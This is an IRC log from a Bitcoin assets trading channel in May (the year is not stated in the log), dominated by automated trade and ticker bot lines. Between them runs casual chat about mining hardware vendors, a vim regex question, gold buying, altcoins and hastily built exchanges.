1 @ 0.226 BTC [-] May 06 14:48:15 [BTCTC] [COGNITIVE] 2 @ 0.225 = 0.45 BTC [-] May 06 14:51:08 asciilifeform https://twitter.com/johnchavens/status/331137269924782080 mwahaha May 06 14:55:12 [MPEX] [S.MPOE] 5484 @ 0.00069757 = 3.8255 BTC [-] May 06 14:56:29 The whole car -- which is about three-metres-long -- takes about 2,500 hours. May 06 14:57:21 105 days? rapid prototyping ftw :D May 06 14:57:47 [BTCTC] [B.YABMC] 50 @ 0.019 = 0.95 BTC [-] May 06 14:58:20 [BTCTC] [B.YABMC] 50 @ 0.01999 = 0.9995 BTC [+] May 06 14:59:24 [BTCTC] [B.YABMC] 100 @ 0.019 = 1.9 BTC [-] May 06 14:59:34 [BTCTC] [B.YABMC] 100 @ 0.02 = 2 BTC [+] May 06 14:59:53 10 months that I carve a gun May 06 15:00:18 [BTCTC] [B.YABMC] 12 @ 0.02 = 0.24 BTC [+] May 06 15:10:03 mircea_popescu: what do you think of the second post? May 06 15:10:36 also, what do you think mpoe-pr will think of this idea...i posted it on the forums May 06 15:11:04 jeez http://www.wired.co.uk/news/archive/2013-02/28/3d-printed-car May 06 15:11:07 ops May 06 15:11:09 wrong link May 06 15:11:13 https://bitcointalk.org/index.php?topic=196150.msg2045992#msg2045992 May 06 15:11:36 how is this even relevant May 06 15:30:07 https://bitcointalk.org/index.php?topic=196367.msg2042966#msg2042966 May 06 15:30:08 hehe May 06 15:32:33 [MPEX] [S.MPOE] 3539 @ 0.00070882 = 2.5085 BTC [+] May 06 15:32:34 [MPEX] [S.MPOE] 2394 @ 0.00071628 = 1.7148 BTC [+] May 06 15:32:40 [MPEX] [S.MPOE] 8223 @ 0.00072199 = 5.9369 BTC [+] May 06 15:56:56 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [-] May 06 15:57:06 [BTCTC] [BTC-BOND] 61 @ 0.01 = 0.61 BTC [-] May 06 15:57:18 [BTCTC] [BTC-BOND] 2 @ 0.01009 = 0.0202 BTC [+] May 06 16:11:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.012575 = 0.2515 BTC [+] May 06 16:11:55 [BTCTC] [TAT.ASICMINER] 28 @ 0.012575 = 0.3521 BTC [+] May 06 16:12:53 [BTCTC] [BASIC-MINING] 1 @ 0.40501 BTC [+] May 06 16:13:17 [BTCTC] [BASIC-MINING] 3 @ 0.405 = 1.215 BTC [-] May 06 16:15:03 [MPEX] [S.MPOE] 9700 @ 0.00070775 = 6.8652 BTC [-] May 06 16:27:13 [BTCTC] [ASICMINER-PT] 2 @ 1.215 = 2.43 BTC [+] May 06 16:28:47 [BTCTC] [ASICMINER-PT] 1 @ 1.219 BTC [+] May 06 16:29:32 [BTCTC] [ASICMINER-PT] 1 @ 1.222222 BTC [+] May 06 16:31:05 [BTCTC] [ASICMINER-PT] 2 @ 1.234867 = 2.4697 BTC [+] May 06 16:31:54 [BTCTC] [ASICMINER-PT] 2 @ 1.2385 = 2.477 BTC [+] May 06 16:46:20 [BTCTC] [ASICMINER-PT] 1 @ 1.2385 BTC [+] May 06 16:47:46 can you do html May 06 17:01:16 [MPEX] [S.MPOE] 6200 @ 0.00071844 = 4.4543 BTC [+] May 06 17:14:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.012575 BTC [+] May 06 17:20:14 [BTCTC] [ASICMINER-PT] 1 @ 1.2399 BTC [+] May 06 17:21:45 Cypto-Trade.com, first cryptobiz to pull the rape card? https://bitcointalk.org/index.php?topic=149458.msg2047601#msg2047601 May 06 17:24:32 [BTCTC] [ASICMINER-PT] 1 @ 1.2575 BTC [+] May 06 17:40:47 !ticker h sdice May 06 17:40:49 [HAVELOCK:SDICE] 1D: 0.24000000 / 0.26588648 / 0.31940000 (155 shares, 41.21240415 BTC), 7D: 0.24000000 / 0.30572923 / 0.33480000 (770 shares, 235.41150561 BTC), 30D: 0.12500000 / 0.30301661 / 0.42700000 (4580 shares, 1387.81608442 BTC) May 06 17:40:58 !ticker h him May 06 17:40:59 [HAVELOCK:HIM] 1D: 1.91020000 / 1.91735455 / 1.92010000 (22 shares, 42.18180000 BTC), 7D: 1.77980000 / 1.90780937 / 2.00000000 (192 shares, 366.29939972 BTC), 30D: 0.75000001 / 1.66627347 / 2.00000000 (767 shares, 1278.03175358 BTC) May 06 17:42:35 ;;ticker May 06 17:42:36 BTCUSD ticker | Best bid: 119.50000, Best ask: 120.00000, Bid-ask spread: 0.50000, Last trade: 120.00000, 24 hour volume: 95019.26425612, 24 hour low: 112.20502, 24 hour high: 124.90000, 24 hour vwap: 119.79422 May 06 17:44:20 [MPEX] [S.MPOE] 15400 @ 0.00071346 = 10.9873 BTC [-] May 06 17:48:28 ;;goxlag May 06 17:48:29 MtGox lag is 38.173593 seconds. During this time, light travels 0.0764994529592 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). May 06 18:05:45 [BTCTC] [ASICMINER-PT] 1 @ 1.258 BTC [+] May 06 18:15:43 $vwap ^OIX May 06 18:15:44 mod6: ^OIX 1 day: no data 7 day: average: 90.30766489 high: 161.41114749 low: 72.40348138 volume: 3489 btc: 1344.73003289 30 day: no data May 06 18:16:41 lol btc.sx changed "trade with no limits" to "trade with fewer limits" May 06 18:16:43 heh May 06 18:19:02 HEH May 06 18:19:17 i saw that wackyness you posted when trying out the service... May 06 18:19:29 yeah that was something. May 06 18:20:31 this one is preety cool too mod6 https://bitcointalk.org/index.php?topic=196189 May 06 18:20:51 motherfucked already edited original post May 06 18:20:58 s/d/r May 06 18:20:59 bleh May 06 18:26:46 heheh. May 06 18:29:13 https://bitcointalk.org/index.php?topic=188735.msg1976963#msg1976963 << this one makes you scratch your head and wonder if anyone tests the stuff they release before they release it. May 06 18:29:19 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19896 BTC [+] May 06 18:29:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19897 BTC [+] May 06 18:29:52 [BTCTC] [CRYPTO-TRADE] 4 @ 0.199 = 0.796 BTC [+] May 06 18:29:57 lulz May 06 18:30:50 not even good enough to alpha an they put it live May 06 18:31:05 well, at least we know where the standards are May 06 18:32:05 anyone of you is a vim regexp rockstar by any chance ? May 06 18:32:33 i'm not interested in regular rockstars though May 06 18:35:37 [MPEX] [S.MPOE] 1894 @ 0.00072199 = 1.3674 BTC [+] May 06 18:35:39 [MPEX] [S.MPOE] 7756 @ 0.00072691 = 5.6379 BTC [+] May 06 18:37:03 mp you here??? http://s20.postimg.org/q8me23519/bbb.jpg May 06 18:38:57 he needs a cane May 06 18:39:01 davout: how do you mean? You can just use the : and enter the regex either via line number or wildcard '%' for entire file. Ex. :% s/foo/bar/ or :15,27 s/foo/bar/ May 06 18:39:06 and probly a bling $$$ necklace May 06 18:39:16 that guy is retarded May 06 18:39:45 and davout, where 15,27 is the range of line numbers May 06 18:45:06 [BTCTC] [ASICMINER-PT] 1 @ 1.256 BTC [-] May 06 18:50:25 mod6: yea, what i'm trying to do is a little harder :) May 06 18:51:01 for example May 06 18:51:03 2013-05-02;2013-05-02;REJ DAVID TOTO RIB INEXPLOIT  ;1 117,3 May 06 18:51:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.012575 BTC [+] May 06 18:51:13 i have a bunch of lines like these in my csv May 06 18:51:21 [BTCTC] [TAT.ASICMINER] 42 @ 0.012575 = 0.5282 BTC [+] May 06 18:51:30 i want to get 2013-05-02;2013-05-02;REJ DAVID TOTO RIB INEXPLOIT;1 117,3 May 06 18:51:54 and then i'll remove spaces between digits, and change commas for periods to get May 06 18:52:06 2013-05-02;2013-05-02;REJ DAVID TOTO RIB INEXPLOIT;1117.3 May 06 18:52:46 tried : 1s/\([^\s]\)\s\+(\;)/\1\2/g May 06 18:52:55 IT DOES NOT BLEND May 06 18:52:57 :-) May 06 18:53:17 (to remove spaces at the end of the field before the semicolon) May 06 18:53:24 [BTCTC] [GSDPT] 3 @ 0.0032 = 0.0096 BTC [+] May 06 18:53:42 [BTCTC] [ASICMINER-PT] 1 @ 1.22401 BTC [-] May 06 18:53:46 i guess i'll just split/split/trim/join/join in ruby May 06 18:53:52 ^^ May 06 18:54:03 [BTCTC] [ASICMINER-PT] 1 @ 1.224 BTC [-] May 06 18:54:10 [BTCTC] [ASICMINER-PT] 1 @ 1.221 BTC [-] May 06 18:54:44 Chaaang-Noi: summon him with some random porn pic May 06 18:56:05 lol May 06 18:56:18 im trying to get a cane and bling added May 06 18:56:23 but mightnot be til weekend May 06 18:59:19 [BTCTC] [TAT.ASICMINER] 6 @ 0.012575 = 0.0755 BTC [+] May 06 19:00:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.0126 = 0.378 BTC [+] May 06 19:11:50 >I understand that the reason BFL looked so good is because of the performance per watt, but just because we want low wattage for maximum profits, and just because that's what we based our pre-orders on, still doesn't mean it's relevant to "Advertised Performance". May 06 19:11:53 lol what a retard May 06 19:12:49 "hey i was scammed but if i think to myself i wasnt, then i wasnt!" May 06 19:13:33 is bfl hardware economic at all? May 06 19:13:54 depends in which century you are getting your devices May 06 19:14:03 heh May 06 19:16:52 hey May 06 19:17:52 BFL: The only reason I'm glad to not have been early adopter May 06 19:18:53 and because they ship FPGA before, i think I would have fallen into the giant trap May 06 19:20:27 when do you buy it ? May 06 19:20:43 thats interesting May 06 19:20:45 refund in $ ? May 06 19:20:54 maybe they didnt send shit May 06 19:21:52 i have doubts they send you anything May 06 19:22:07 sent May 06 19:22:18 ... May 06 19:23:32 you paid 47btc ? May 06 19:23:54 good deal May 06 19:27:52 should take 10min to find the same story in fiat May 06 19:28:46 but at least you got a refund... May 06 19:32:06 [HAVELOCK] [VTX] 1 @ 0.4663 BTC [-] May 06 19:32:07 [HAVELOCK] [VTX] 2 @ 0.4660001 = 0.932 BTC [-] May 06 19:32:09 [HAVELOCK] [VTX] 4 @ 0.466 = 1.864 BTC [-] May 06 19:32:09 [HAVELOCK] [VTX] 1 @ 0.45661 BTC [-] May 06 19:32:43 usagi that sucks.. it 'disappeared'? they auctioned it off somewhere more likely. May 06 19:33:13 [MPEX] [S.MPOE] 4250 @ 0.00072691 = 3.0894 BTC [+] May 06 19:37:50 [MPEX] [S.MPOE] 5700 @ 0.00072035 = 4.106 BTC [-] May 06 19:42:18 good link usagi, good general rules in there. i'll digest the rest later. May 06 19:45:41 [BTCTC] [ASICMINER-PT] 1 @ 1.201026 BTC [-] May 06 19:45:49 [BTCTC] [ASICMINER-PT] 1 @ 1.201016 BTC [-] May 06 19:45:53 [BTCTC] [ASICMINER-PT] 2 @ 1.201005 = 2.402 BTC [-] May 06 19:46:03 [BTCTC] [ASICMINER-PT] 2 @ 1.201 = 2.402 BTC [-] May 06 19:46:24 [BTCTC] [ASICMINER-PT] 4 @ 1.2 = 4.8 BTC [-] May 06 19:51:54 usagi nooooooooo! May 06 19:52:33 because there always is. May 06 19:58:57 [MPEX] [S.MPOE] 9094 @ 0.00072691 = 6.6105 BTC [+] May 06 19:58:59 [MPEX] [S.MPOE] 3458 @ 0.00073306 = 2.5349 BTC [+] May 06 20:01:27 [MPEX] [S.MPOE] 11350 @ 0.00072035 = 8.176 BTC [-] May 06 20:03:23 http://data.cnbc.com/quotes/MTGOXUSD May 06 20:07:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.0126 = 0.126 BTC [+] May 06 20:10:05 [HAVELOCK] [HIM] 1 @ 1.900001 BTC [-] May 06 20:12:05 [HAVELOCK] [SDICE] 2 @ 0.305 = 0.61 BTC [+] May 06 20:20:06 [HAVELOCK] [SDICE] 2 @ 0.31 = 0.62 BTC [+] May 06 20:22:06 [HAVELOCK] [HIM] 1 @ 1.900001 BTC [-] May 06 20:25:57 [BTCTC] [COGNITIVE] 1 @ 0.23551 BTC [+] May 06 20:27:01 ;;ticker May 06 20:27:02 BTCUSD ticker | Best bid: 120.31501, Best ask: 120.77774, Bid-ask spread: 0.46273, Last trade: 120.77774, 24 hour volume: 104141.50050386, 24 hour low: 114.01000, 24 hour high: 124.90000, 24 hour vwap: 120.16380 May 06 20:31:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0126 BTC [+] May 06 20:32:47 Chaaang-Noi, how long has that been there? May 06 20:33:07 at least 1 hour May 06 20:33:24 but cool as hell May 06 20:33:49 Ive seen that before actually May 06 20:33:51 weeks ago May 06 20:33:54 cool May 06 20:34:02 but still cool May 06 20:35:45 very May 06 20:44:24 [BTCTC] [ASICMINER-PT] 1 @ 1.231966 BTC [+] May 06 20:44:29 [BTCTC] [ASICMINER-PT] 1 @ 1.231967 BTC [+] May 06 20:55:07 [HAVELOCK] [SDICE] 1 @ 0.317 BTC [+] May 06 20:59:04 [MPEX] [S.MPOE] 6858 @ 0.0007292 = 5.0009 BTC [+] May 06 20:59:06 [MPEX] [S.MPOE] 8997 @ 0.00072734 = 6.5439 BTC [-] May 06 21:21:13 [BTCTC] [ASICMINER-PT] 2 @ 1.22 = 2.44 BTC [-] May 06 21:22:39 [BTCTC] [ASICMINER-PT] 2 @ 1.222222 = 2.4444 BTC [+] May 06 21:24:37 [BTCTC] [TAT.ASICMINER] 20 @ 0.0126 = 0.252 BTC [+] May 06 21:32:54 [MPEX] [S.MPOE] 10800 @ 0.00073025 = 7.8867 BTC [+] May 06 21:34:32 is blockchain.info guy on irc? May 06 21:40:57 kakobrekla: not that I've seen... May 06 21:45:05 last time I had an issue with the website I came to irc lookin for Ben Reeves, but didnt find him around here... May 06 21:45:25 and now it just says this: If there is a problem with the website please check twitter first << from https://blockchain.info/support-desk May 06 21:45:49 which i promptly blew them up on their twitter, finally got some resolution after a number of hours... *shrug* May 06 21:46:21 i kinda felt bad about buggin them through twitter for christsake so i donated .25 btc May 06 21:46:24 pff May 06 21:47:44 lol May 06 21:52:07 Heheh. Oh and, since I said I would give -assets an update... I did get good delivery on my (gold) order from coinabul.com. May 06 21:52:41 you got a gold bug? May 06 21:52:48 It was actually attempted to be delivered on Friday, but somehow the guy didn't knock on the door? So I had to walk to the P.O. to sign for it today. But it's all good! May 06 21:53:40 Well, I'm not a big gold bug or silver bug. Just wanted to have a small amt. just in case. May 06 21:54:20 And I'd been looking at coinabul.com for a long time trying to figure out if I should place an order for either or both with my precious btcs. May 06 21:54:57 Of course we've all seen all the back and forth drama... I figured it was worth a shot. May 06 21:55:06 some1 with good understanding of ripple and bistamp ? i want verify if i made a mistake May 06 21:55:39 [BTCTC] [PAJKA.BOND] 1 @ 0.1081 BTC [-] May 06 22:03:49 It worries me about how things are over here. I wanted to have some silver and gld in case of some huge cluster fuck where I need to pay for something in metal as opposed to bitcoin. People over here have heard of bitcoin, but they don't know what it is or how to use it, so to them its pretty much "oh thats a scam.." May 06 22:04:52 so rather than waste my own time trying to explain what it is, and why they should give me gasoline or food for it, i'd just rather have some metals to pay with just in case. May 06 22:06:00 but maybe if -dev doesn't wreck it before anyone gets a fuckin chance to figure out how cool btc is... May 06 22:06:42 [MPEX] [S.MPOE] 2466 @ 0.00073025 = 1.8008 BTC [+] May 06 22:06:43 [MPEX] [S.MPOE] 5385 @ 0.00072734 = 3.9167 BTC [-] May 06 22:07:13 meh May 06 22:07:19 there will always be cryptocurrencies May 06 22:07:27 btc May 06 22:07:28 ltc May 06 22:07:29 ftc May 06 22:07:55 winner should literally not matter if you hedge appropriately. May 06 22:09:31 even assuming any ultimate winner, and not some ecosystem of complimentary cryptocurrencies May 06 22:11:54 [MPEX] [S.MPOE] 38 @ 0.0007221 = 0.0274 BTC [-] May 06 22:12:27 [BTCTC] [ASICMINER-PT] 1 @ 1.20101 BTC [-] May 06 22:12:35 [BTCTC] [ASICMINER-PT] 1 @ 1.201 BTC [-] May 06 22:12:40 [BTCTC] [ASICMINER-PT] 1 @ 1.20005 BTC [-] May 06 22:12:48 [BTCTC] [ASICMINER-PT] 2 @ 1.2 = 2.4 BTC [-] May 06 22:13:38 [BTCTC] [ASICMINER-PT] 1 @ 1.219 BTC [+] May 06 22:16:40 [MPEX] [S.MPOE] 7200 @ 0.00072151 = 5.1949 BTC [-] May 06 22:16:42 [MPEX] [S.MPOE] 5081 @ 0.00072035 = 3.6601 BTC [-] May 06 22:16:46 [MPEX] [S.MPOE] 10756 @ 0.00071363 = 7.6758 BTC [-] May 06 22:16:50 [MPEX] [S.MPOE] 15680 @ 0.0007112 = 11.1516 BTC [-] May 06 22:16:51 [MPEX] [S.MPOE] 11650 @ 0.00070775 = 8.2453 BTC [-] May 06 22:16:55 [MPEX] [S.MPOE] 4371 @ 0.00070663 = 3.0887 BTC [-] May 06 22:21:56 [BTCTC] [B.YABMC] 25 @ 0.0197 = 0.4925 BTC [-] May 06 22:22:20 benkay: well, yeah, lets hope that cryptocurrencies are here to stay. May 06 22:22:20 ;;calc 5.2+3.66+7.68+11.16+8.24+3.089+.4925 May 06 22:22:20 39.5215 May 06 22:22:28 $avg May 06 22:22:29 benkay: 120.13 May 06 22:22:35 ;;calc 39.5*120 May 06 22:22:35 4740 May 06 22:23:09 ;;calc 1000000000*0.00070663*120 May 06 22:23:10 84795600 May 06 22:23:18 wat May 06 22:25:09 i dunno if this is the place to ask May 06 22:25:34 but the iron man 3 weekend gross bet, on bitbet.us is resolved (the final numbers are in) May 06 22:25:44 but the resolution date is set for like 3 more days from now May 06 22:26:22 ok May 06 22:27:34 so i was hoping for a manual adjustment so the payouts would go out May 06 22:29:13 TTTBBBUUUXXX, heres a good palce but you can comment right under the bet, too. May 06 22:30:11 did that first 8) May 06 22:30:28 yesterday May 06 22:40:47 [BTCTC] [ASICMINER-PT] 1 @ 1.211111 BTC [-] May 06 22:41:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.01255 = 0.0251 BTC [-] May 06 22:41:48 sign of the bitcoin apocalypse? My mom just forwarded me an email from Readers Digest with the lead article: "Can Bitcoin Make You Rich? May 06 22:42:12 http://www.rd.com/recommends/everything-you-need-to-know-about-the-bitcoin-boom/ May 06 22:43:51 BUBBLE. May 06 22:44:22 fuck me readers digest? May 06 22:44:46 I've seen worse articles in tech sites May 06 22:44:58 it has a bunch of links to other articles too May 06 22:45:37 you know what I hate about a lot of bitcoin articles - photo representations of what appear to be physcial currency - very misleading, espcially to the RD crowd, I would imagine... May 06 22:47:06 I've pondered that too, but couldn't come up with an obviously better graphic to depict May 06 22:47:28 maybe bitcoin needs a coin logo that is not so realistic May 06 22:47:31 i know, troubling... May 06 22:47:36 something 8bit or something May 06 22:48:00 then it will just look like mario coins May 06 22:48:01 how about just the hashed "B" May 06 22:48:20 admittedly i like seeing the coins too May 06 22:48:33 it's a pardigm shift, so some kind of anchor helps May 06 22:48:48 paradigm* May 06 22:48:49 hashed b is appealing to minimalists but doesn't have the multisensory appeal that the magazines are looking for May 06 22:49:34 i suppose... May 06 22:49:45 plus using a gold color gives a lot of credibility May 06 22:50:07 [HAVELOCK] [SDICE] 2 @ 0.318 = 0.636 BTC [+] May 06 22:50:09 [HAVELOCK] [SDICE] 1 @ 0.317 BTC [-] May 06 22:50:54 heh May 06 22:51:04 it's got gold on it! it must be really worth a thing. May 06 22:51:52 it's then easy to use phrases like gold 2.0 May 06 22:52:08 i want to know what gold 0.2 looked like May 06 22:53:19 http://www.sonofthesouth.net/texas/pictures/gold-rush_small.jpg May 06 22:53:30 those were hard times, my friend May 06 22:53:53 low hash rate, high difficulty May 06 22:53:53 i tell you miners these days have no idea what it was like May 06 22:54:16 ha May 06 22:54:32 [BTCTC] [TAT.ASICMINER] 8 @ 0.01255 = 0.1004 BTC [-] May 06 22:54:44 wonder how long it will be til someone tries to make an altcoin called Bitcoin 2.0 May 06 22:54:51 [BTCTC] [COGNITIVE] 1 @ 0.23975 BTC [+] May 06 22:55:01 [BTCTC] [COGNITIVE] 2 @ 0.23976 = 0.4795 BTC [+] May 06 22:55:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.012575 = 0.1132 BTC [+] May 06 22:58:31 seems like we're approach alt saturation May 06 22:59:36 although i did see some guy was try to create a coin backed by a physical commodity May 06 22:59:44 [BTCTC] [ASICMINER-PT] 1 @ 1.211111 BTC [-] May 06 23:00:26 these new alts every month are just to keep LTC difficulty down I think May 06 23:02:04 not a bad thing... ltc diff will skyrocket when scrypt fpgas hit May 06 23:04:31 [BTCTC] [B.YABMC] 1 @ 0.0197 BTC [-] May 06 23:04:46 any opinions on this PUT contract? https://bitcointalk.org/index.php?topic=195523 May 06 23:10:18 7% for 6-9 month at 1.15 is WAY too cheap May 06 23:11:31 ;;ticker May 06 23:11:31 BTCUSD ticker | Best bid: 112.00000, Best ask: 112.19999, Bid-ask spread: 0.19999, Last trade: 112.19999, 24 hour volume: 113684.68908688, 24 hour low: 112.12000, 24 hour high: 124.90000, 24 hour vwap: 119.81824 May 06 23:12:14 would you do 6 months 15% at the same 1.15 strike? May 06 23:21:47 [MPEX] [S.MPOE] 10350 @ 0.00070663 = 7.3136 BTC [-] May 06 23:34:07 [HAVELOCK] [SDICE] 4 @ 0.3 = 1.2 BTC [-] May 06 23:34:49 https://bitcointalk.org/index.php?topic=196189.msg2051162#msg2051162 May 06 23:36:41 is this what you do kako? May 06 23:36:49 sitting on irc daily being a cnut? May 06 23:36:50 ;) May 06 23:36:53 ya! May 06 23:36:56 CNUT OMG May 06 23:37:29 thar May 06 23:37:31 its official. May 06 23:38:00 hahah May 06 23:38:29 c-nut May 06 23:42:46 'so why don't you quit your negative nancy bullshit' << this kills me May 06 23:44:14 your opionions are ruining teh buttcoin May 06 23:51:12 [BTCTC] [ASICMINER-PT] 1 @ 1.211111 BTC [-] May 06 23:54:52 well i dunno where -pr is May 06 23:54:55 so i had to say something May 06 23:55:25 these people... they are only hurting btc May 06 23:55:29 and they dont realize it May 06 23:56:41 nicley telling them wont change anything as well May 06 23:56:47 i just feel better after steaming May 06 23:57:06 why May 06 23:57:40 people who are benefitial to btc would agree with me May 06 23:57:44 na these guys need to be told. May 06 23:57:47 yah kakocnut May 06 23:57:55 telling them won't change anything May 06 23:57:57 [BTCTC] [S.MPOE-PT] 5 @ 0.000614 = 0.0031 BTC [-] May 06 23:58:03 they need to suffer to learn May 06 23:58:07 so i did no harm May 06 23:58:09 these guys think 'oh, let's just hack an exchange together in a weekend!' May 06 23:58:10 ;;ticker May 06 23:58:11 BTCUSD ticker | Best bid: 113.69999, Best ask: 113.70000, Bid-ask spread: 0.00001, Last trade: 113.70000, 24 hour volume: 122919.65485108, 24 hour low: 111.30001, 24 hour high: 124.90000, 24 hour vwap: 119.26914 May 07 00:01:26 even people said to me, "OMG WTF HAPPENED 2 GOX MOD6?!?!?! Y NO U MAKE EXCHANGE?!!!" May 07 00:01:37 im like: *sigh* May 07 00:01:49 myea May 07 00:02:04 nothing changes until enough pain is incurred. May 07 00:02:25 then some might change. maybe May 07 00:03:04 [BTCTC] [TAT.ASICMINER] 41 @ 0.012575 = 0.5156 BTC [+] May 07 00:03:41 but its like these guys have probably no prior exp. running anything of the kind. and when they just think 'oh! i know how to get us rich! We'll just write this exchange and run it!' May 07 00:04:12 that's because nobody legitimate is willing to risk so much on bitcoin. May 07 00:04:26 so hacks fill the space in the meantime May 07 00:05:05 but then they don't even take time to test its functions apparently? as kakocnut discovered when he went short on that one site btcbutt.sx or something May 07 00:05:34 well that costs money... and hacks don't have that. May 07 00:05:46 but but mod6 we got investors and advisors!!11one May 07 00:05:47 so they say fuck it, I'll test in production! May 07 00:05:57 haha May 07 00:06:04 test in production May 07 00:06:09 motto of bitcoin-assets May 07 00:06:19 I HAVE SEEN YOU ALL DOING THIS May 07 00:06:25 lol^ May 07 00:06:42 all the fuck of you May 07 00:06:47 haha, i test all my stuff before it gets posted! May 07 00:06:56 tddlolwut May 07 00:07:01 maybe not mod6 May 07 00:07:09 [HAVELOCK] [SDICE] 4 @ 0.3 = 1.2 BTC [-] May 07 00:07:11 i've found a bug or two here and there, but I fix 'em right away if found. I don't think anyone really uses it anyway tho... May 07 00:07:12 mod6 are you running a service? May 07 00:07:18 there are things you can test in production May 07 00:07:23 and there are things you cant May 07 00:07:49 not a service... i just have some code that interacts with mpex May 07 00:08:02 its open source May 07 00:08:09 > If Tetris has taught me anything, it is that errors pile up and accomplishments disappear May 07 00:09:21 fair enough May 07 00:10:13 o man, gotta love this guy https://bitcointalk.org/index.php?topic=192122.msg2052067#msg2052067 May 07 00:10:42 oh right! did you write pympex? May 07 00:10:51 i have a bone to pick with someone about that May 07 00:10:59 but i may chew on it and submit a PR May 07 00:11:12 that would be Azelphur May 07 00:11:16 o. May 07 00:12:32 O_o May 07 00:13:40 yeah its basically google without the css May 07 00:14:04 truffles, we're in the #bitcoin-assets channel. these people have created the first assets exchange, and it's call MPEX for mircea_popescu's exchange May 07 00:14:08 called* May 07 00:14:25 twas not the first to be exact May 07 00:14:41 and it was not made by all 'these' pople May 07 00:14:52 (14:10) < benkay> oh right! did you write pympex? << no that'd be Azelphur :) May 07 00:14:55 the the cunt owns that. May 07 00:14:57 well you and mp and some other maniacs May 07 00:15:07 o.O May 07 00:15:10 the the = no the May 07 00:15:13 there's one! May 07 00:15:55 mpex is an exchange May 07 00:16:03 it exchanges assets of other ccompanies May 07 00:16:19 and sells options and bonds May 07 00:16:19 wat May 07 00:16:36 truff1es you can start by visiting the link in the topic May 07 00:16:47 ;;ticker May 07 00:17:22 indeed truffles May 07 00:17:44 there a quite a few things unique to bitcoin :) May 07 00:18:27 huh May 07 00:18:31 assbot covers like 3 May 07 00:18:40 the relevant ones that is :) May 07 00:18:44 o bye gribble May 07 00:18:51 thanks for the ticker info. May 07 00:19:40 theres a bunch of them May 07 00:20:24 .... May 07 00:20:25 I wonder where they are? May 07 00:20:36 maybe the interwebs would tell us May 07 00:21:39 well , ifap.co is a very popular asset site May 07 00:22:15 [BitFunder] Diablo Mining Company [shifting gears] May 07 00:22:26 i swear i have read that [shitting ears] May 07 00:23:21 I have a retarded guy that works me, his vociemail says "shifting gears and changing lanes, call you back later" May 07 00:24:49 lol May 07 00:25:45 a whole bunch of different exchanges post to -assets May 07 00:25:49 btctc May 07 00:25:59 havelock May 07 00:27:15 got a bit of a sell off going on here... May 07 00:28:29 mercy ya puffnstuff, where are you? May 07 00:28:55 mircea_popescu* May 07 00:29:33 looking for my withdrawal plx May 07 00:31:25 ;;ticker May 07 00:31:40 did anything ever happen w/ that coinbase/mtgox lawsuit? May 07 00:31:53 lawyers don't move that quickly May 07 00:31:56 a lot of coin changing hands here.. May 07 00:32:00 ;;ticker May 07 00:32:20 http://btcmu.org May 07 00:32:26 coming soon! May 07 00:33:05 ew, launchrock? May 07 00:33:11 ? May 07 00:33:13 puke barf May 07 00:33:16 startup bros starting startups to help startup bros startup May 07 00:33:35 [MPEX] [S.MPOE] 5450 @ 0.00071551 = 3.8995 BTC [+] May 07 00:33:46 yo i heard you like proxies ion your proxies May 07 00:34:27 the future May 07 00:34:47 sell it May 07 00:35:01 we/i have no intenetions of doing anything with it May 07 00:35:10 until some of operation has been established May 07 00:35:16 some mode May 07 00:35:35 it's all very secretive May 07 00:36:13 your email is safe with me unless launchrock is compromised May 07 00:36:15 ymmv May 07 00:37:29 what is your intention with btcmu? May 07 00:37:57 i'd like to think of it as foundation foor pools and miners May 07 00:38:22 new mining code? May 07 00:38:30 think less like a labour union May 07 00:38:45 and more like a general union of like minded individuals May 07 00:39:14 may be 3 pools on the board May 07 00:39:28 no tim eight now bbl May 07 00:49:08 [HAVELOCK] [SDICE] 1 @ 0.283 BTC [-] May 07 00:50:09 [HAVELOCK] [SDICE] 1 @ 0.2831 BTC [+] May 07 00:51:09 [HAVELOCK] [SDICE] 1 @ 0.28300001 BTC [-] May 07 00:51:10 [HAVELOCK] [SDICE] 1 @ 0.283 BTC [-] May 07 00:51:11 [HAVELOCK] [SDICE] 1 @ 0.283 BTC [-] May 07 00:51:12 [HAVELOCK] [SDICE] 4 @ 0.2802 = 1.1208 BTC [-] May 07 00:53:08 [HAVELOCK] [SDICE] 1 @ 0.284 BTC [+] May 07 00:55:08 [HAVELOCK] [HIM] 3 @ 1.9399 = 5.8197 BTC [+] May 07 00:56:08 [HAVELOCK] [SDICE] 1 @ 0.285 BTC [+] May 07 00:56:10 [HAVELOCK] [SDICE] 1 @ 0.2851 BTC [+] May 07 00:56:11 [HAVELOCK] [SDICE] 1 @ 0.288 BTC [+] May 07 00:57:09 [HAVELOCK] [SDICE] 1 @ 0.2925 BTC [+] May 07 00:57:10 [HAVELOCK] [SDICE] 1 @ 0.2925 BTC [+] May 07 00:58:09 [HAVELOCK] [SDICE] 1 @ 0.2929 BTC [+] May 07 00:58:09 [HAVELOCK] [SDICE] 1 @ 0.29291 BTC [+] May 07 00:58:11 [HAVELOCK] [SDICE] 1 @ 0.29291 BTC [+] May 07 00:59:08 [HAVELOCK] [SDICE] 1 @ 0.293 BTC [+] May 07 01:03:14 deuce blowin up May 07 01:04:02 [MPEX] [S.MPOE] 22200 @ 0.00071239 = 15.8151 BTC [-] May 07 01:04:04 [MPEX] [S.MPOE] 488 @ 0.00070663 = 0.3448 BTC [-] May 07 01:04:41 [MPEX] [S.DICE] 593 @ 0.003 = 1.779 BTC [-] May 07 01:05:31 poe tankin May 07 01:05:43 on an entirely different topic May 07 01:05:57 "yo dawg i herd you need to look at your rack" May 07 01:05:58 http://imgur.com/z76TjKq May 07 01:18:16 gribbs needed a break May 07 01:18:31 oop wrong chan May 07 01:18:32 ;;ticker May 07 01:18:52 $avg May 07 01:18:53 benkay: 117.54 May 07 01:19:08 $vwap ^OIX May 07 01:19:10 mod6: ^OIX 1 day: no data 7 day: average: 89.88747716 high: 160.53825434 low: 72.33603038 volume: 3468 btc: 1335.40319189 30 day: no data May 07 01:23:38 limited targets today tiberiusiv May 07 01:23:53 benkay: yo dawg I herd you like to track your assets so I stuck an 